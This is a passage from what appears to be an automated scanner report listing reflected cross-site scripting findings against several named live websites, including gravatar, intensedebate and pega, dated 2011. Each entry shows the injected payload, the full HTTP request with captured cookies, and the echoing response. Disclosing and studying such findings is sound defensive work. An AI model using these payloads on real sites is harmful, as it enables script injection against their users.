Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<a href="http://en.gravatar.com/sitef83a0"><a>822417fb1b/login/%252F.json">
...[SNIP]...

3.23. http://en.gravatar.com/site/login/%252F [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a34"><a>f3a3ad4ddd1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /site/login/%252F44a34"><a>f3a3ad4ddd1 HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:34:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:34:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 6358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<form method="post" action="/sessions/44a34"><a>f3a3ad4ddd1">
...[SNIP]...

3.24. http://intensedebate.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ed5a1'><script>alert(1)</script>0497f372f83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ed5a1'><script>alert(1)</script>0497f372f83=1 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 18492

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/?ed5a1'><script>alert(1)</script>0497f372f83=1'>
...[SNIP]...

3.25. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b436c<script>alert(1)</script>1dbb46b674e was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07608b436c<script>alert(1)</script>1dbb46b674e HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=MLvH+QcJZzpn51KdVPOgNEq4ycXXNAyCN+LRv9fsONVfRqt6Qn35QexQL31IlbitPCMvDwBMAQWU4RBAwCEMoMFFT0t18ir5y2YIZKsVf4A1MyV5pIzguYiK8y+o8zbIRZrZ9xyanQeHqcRo9uARt2M2hUoJyA1o3PPpYvAgJnquuQOveNt+kyObkCyOeLVAQBx3JPcv81M4vRIMnRw0wo58TG2ePQWa50SMXHxvrRIInkvJS+F5enSqgTnBr71q81exva1eOKPUWKTIz4VpYRcalFe1tKQ25zvzgpgRN4p9y95tlJNo1dKcS8E9JQa/aIYcsgrgCeb9HaHv61V3YFjJdwoln4Pcqz6Zdpf3dF3pQAJRSPTBwdbK1yjIYZ1HnH8PlbazgcDaHXlBte9YvNOMF9LUsvTCO9OtmnXFvaIJ8gm7AxzpQ6H6c5peDD4hh50s/S6dyey0uJnVJNGB9mudh6gl4xhA1gAn9TG2VaHUlSg/MZN4N4eOF6oZrw8tLZu6cPeYYeCrpQj/T6CBFEEP7hELSVaqziK1Ig5F0M76EO9h7CFMB9DJO9u28jcej/u6pVe9w4w0OGPEHexnmazLoPwbBbQg3WfdPF2DkI+4om/DZL0Os8CJSMakm6OuP3nItB64r8sfMpstkr7tWQevuO79HqbZThGOYcZpCcZ2dnxoU2qse4nhXnastPwh+AHpTlQ2TViAXBB3Vb/oMHPx2YzUJ0e/8qcTnlDGFTkcJF+FiqbzfFBGT1XQoJ5tbCsJSNN/0bJJYeZsryNG+cphBle1M3pnHwWbE0Ac5F+wi3qpofX/i8o+JPCkR73+7fZXp4cD8o9TVaMVs+1H5+5WrHcapiPyXjo/2u88tqI8W1eGozRtFBR/GkDIJaU1sDbyaA5WJqdXZ8a/3qKUtRNyzp9rxoqF+XkRAX45pBDT73AqfhAExsM14sPXvi5NVHH28JIua4pKod9lltgJXBYFgD19HPxU0ZE1DzqTVnnZ+cmLIg3Y8xUvgthgARtmiJCss+deTAWmQg99bc5VAEgS7WlFYgBc65REKq1h42sTf632vhHfEbkuX7FO/kEPTjREzcmgEEmj6PfU+DqIGMWgmiUW7IJb2dvvA0jbfQH9cPxn4MATH+0y0Zb1m0wasEnPVxmvh/HRAFaVctanOU35/ErLXSzIByXHZyg7na2o07eicOqHCaq00wrvQxUSYV+oxNq6NDuMfLka4Se9gTjw9ZZMj63R5Bly2VCZnnvU33jTGcPtz2wBRLDyRjzDlALCzcxI/NCA1Kkm6joZHwlZU4Jr6SLMVKxlDrl5eSGkA6qwGUo7I1ZDjlid/k47g0ld7KJWZIRG6oUAjl0wT9ANgf4d7UDmSUnVXT8TaPnnKl+7DF6ID6pghiFIYKBnIcIltk+3WO5r316iq34xREuAyhLzvwn4AoNXbEuSDQirEtkRsqC9yghnhNCABZMLBvxyPptwHbvT4weL5k6PwCsDrdRFMLapAvP00t8HZynDglCUyW5YJhpNhMsj8rRMcrTHiio95XzpYQVICbRfxvuAGI4w+qoaJxndiQ0mwnayN8s7AVc3X9pDkKlKPXDarNuJ/EARWPRfcxJy18d++UkPeTX60moLBcxP4mHPFrlwOSQ4+Qyc1B7NXrg2xwBlmlZnc/vy3Fi31gon/6p7zhOIxDCGiKwEFknz7vadgGqld1cLwqzH6OhAfY8jsa8p/26SOjOygKEBIgsrm+13EcEK+6PNyPsimfyFeYkUHabdz8dGftnMPLgf7+B8Zx14LqwoUkwEzF4omy4BUQUOm2iPErATdY015XBw/3ngiiZYGnwMjyKAYQ6Go969u6BjTqw1Dlng/CNJPq7KdHKtbhWeDZIswWfS+UXRS226Ov8g5X+6P2i7NhxTKJbnBNDPHleNXzq+KRB/tUMjhb+TyiAfkxVF2E2L3v5xUy221azIhh7ArlMe3ZXI7sXJlF0YqHE/fsVdNop89QLOCGlS2np1IqezLb7srY/u9dJepf/59b38dqo3zGkfUdtHC8MK0MM4gGjo2su0M8iS+RWiOUs4V30Py9KJ+qjnOkhJMjIZvZ5R/sfHr78ja97y6gpUz6sLuYOUsD1JY6XZxF9mXiOn8pGzt3QGrPV5unR/EPPonFSA6Oj6Ei8ImLz7WprXeIljuzyKYZ5azxgfeA==; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 14 Jun 2011 00:13:59 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 15 Jun 2011 00:13:59 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:59 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07608B436C<SCRIPT>ALERT(1)</SCRIPT>1DBB46B674E" was not recognized.
*/

3.26. http://members.pega.com/cookiecheck.asp [pcd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /cookiecheck.asp

Issue detail

The value of the pcd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36122"%3balert(1)//fab585167f2 was submitted in the pcd parameter. This input was echoed as 36122";alert(1)//fab585167f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiecheck.asp?pcd=/login.asp36122"%3balert(1)//fab585167f2 HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:28:06 GMT
Date: Tue, 14 Jun 2011 12:29:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 31648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/
...[SNIP]...
test_cookie') == 'cookie_value') {
       // cookie worked
       $.cookie('nocheck', '1', { expires: 180, path: '/', domain: 'pega.com', secure: false });
       //redirect to destination
       var dst = "/login.asp36122";alert(1)//fab585167f2";
       if (dst == '') {
           dst = "/login.asp";    
       }
       if (dst != 'bad'){
           document.location = dst;
       }
   } else {
       // cookie failed
       alert("To sign in to pega.com, you must have cookies enabl
...[SNIP]...

3.27. http://members.pega.com/login.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /login.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeb55"%3balert(1)//5f8752a598e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eeb55";alert(1)//5f8752a598e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login.asp?eeb55"%3balert(1)//5f8752a598e=1 HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB; __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.8.10.1308054477; __utmz=87550468.1308054615.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87550468.1252779431.1308054615.1308054615.1308054615.1; __utmc=87550468; __utmb=87550468.1.10.1308054615; test_cookie=cookie_value; nocheck=1

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:36:11 GMT
Date: Tue, 14 Jun 2011 12:37:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Set-Cookie: pega%5Fautolog=000; expires=Wed, 13-Jun-2012 04:00:00 GMT; path=/
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 35643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
true;
   finished &= emailComplete(e.email_address.value);
   finished &= passwordCheck(e.password_display.value);
   return finished;
}

function tryToRegister(){
   e.login_form.action="register.asp?eeb55";alert(1)//5f8752a598e=1&";
   e.submitted.value = "1";
   //hide("password_display");
   e.password.value = lemon(e.password_display.value);
   e.password_display.value = "";
   e.login_form.onsubmit = null;
   e.login_form.subm
...[SNIP]...

3.28. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /63975/17983acd3149cc7b59eebf3385392137

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 925bf<script>alert(1)</script>2fdbf40cf8d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

